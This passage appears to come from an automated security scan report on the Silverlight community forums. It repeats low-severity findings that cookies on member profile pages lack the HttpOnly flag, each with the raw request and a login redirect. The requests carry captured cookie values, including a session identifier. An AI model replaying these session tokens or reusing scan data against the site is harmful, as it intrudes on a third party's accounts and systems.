Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFurukoo.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFurukoo.asp
...[SNIP]...

17.219. http://forums.silverlight.net/members/GFR_5F00_2009.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/GFR_5F00_2009.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/GFR_5F00_2009.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGFR_5F00_2009.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGFR_5F00_20
...[SNIP]...

17.220. http://forums.silverlight.net/members/Gaz3ll.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Gaz3ll.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Gaz3ll.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGaz3ll.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:59 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGaz3ll.aspx
...[SNIP]...

17.221. http://forums.silverlight.net/members/Jonathan-Shen-_1320_-MSFT.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Jonathan-Shen-_1320_-MSFT.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Jonathan-Shen-_1320_-MSFT.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 253
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fJonathan-Shen-_1320_-MSFT.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fJonathan-Sh
...[SNIP]...

17.222. http://forums.silverlight.net/members/MF_5F00_MiEK.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/MF_5F00_MiEK.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/MF_5F00_MiEK.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 240
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMF_5F00_MiEK.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:02 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMF_5F00_MiE
...[SNIP]...

17.223. http://forums.silverlight.net/members/MisterGoodcat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/MisterGoodcat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/MisterGoodcat.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMisterGoodcat.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMisterGoodc
...[SNIP]...

17.224. http://forums.silverlight.net/members/Shi-Ding-_2D00_-MSFT.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Shi-Ding-_2D00_-MSFT.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Shi-Ding-_2D00_-MSFT.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 248
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fShi-Ding-_2D00_-MSFT.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fShi-Ding-_2
...[SNIP]...

17.225. http://forums.silverlight.net/members/Skyrunner.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Skyrunner.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Skyrunner.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fSkyrunner.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:17 GMT; expires=Sun, 29-Jan-2012 23:16:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:18 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fSkyrunner.a
...[SNIP]...

17.226. http://forums.silverlight.net/members/TimeBandit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/TimeBandit.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/TimeBandit.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fTimeBandit.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:27 GMT; expires=Sun, 29-Jan-2012 23:16:27 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:28 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fTimeBandit.
...[SNIP]...

17.227. http://forums.silverlight.net/members/Xpert360.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Xpert360.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Xpert360.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fXpert360.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:01 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fXpert360.as
...[SNIP]...

17.228. http://forums.silverlight.net/members/_2D002D00_Will_2D002D00_.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/_2D002D00_Will_2D002D00_.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/_2D002D00_Will_2D002D00_.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 252
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2f_2D002D00_Will_2D002D00_.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2f_2D002D00_W
...[SNIP]...

17.229. http://forums.silverlight.net/members/abeaulieu.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/abeaulieu.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/abeaulieu.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fabeaulieu.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:01 GMT; expires=Sun, 29-Jan-2012 23:16:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:01 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fabeaulieu.a
...[SNIP]...

17.230. http://forums.silverlight.net/members/alt_5F00_fo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/alt_5F00_fo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/alt_5F00_fo.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 239
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2falt_5F00_fo.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2falt_5F00_fo
...[SNIP]...

17.231. http://forums.silverlight.net/members/billb08.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/billb08.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/billb08.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbillb08.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:10 GMT; expires=Sun, 29-Jan-2012 23:17:10 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:11 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbillb08.asp
...[SNIP]...

17.232. http://forums.silverlight.net/members/bradsevertson.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/bradsevertson.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/bradsevertson.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
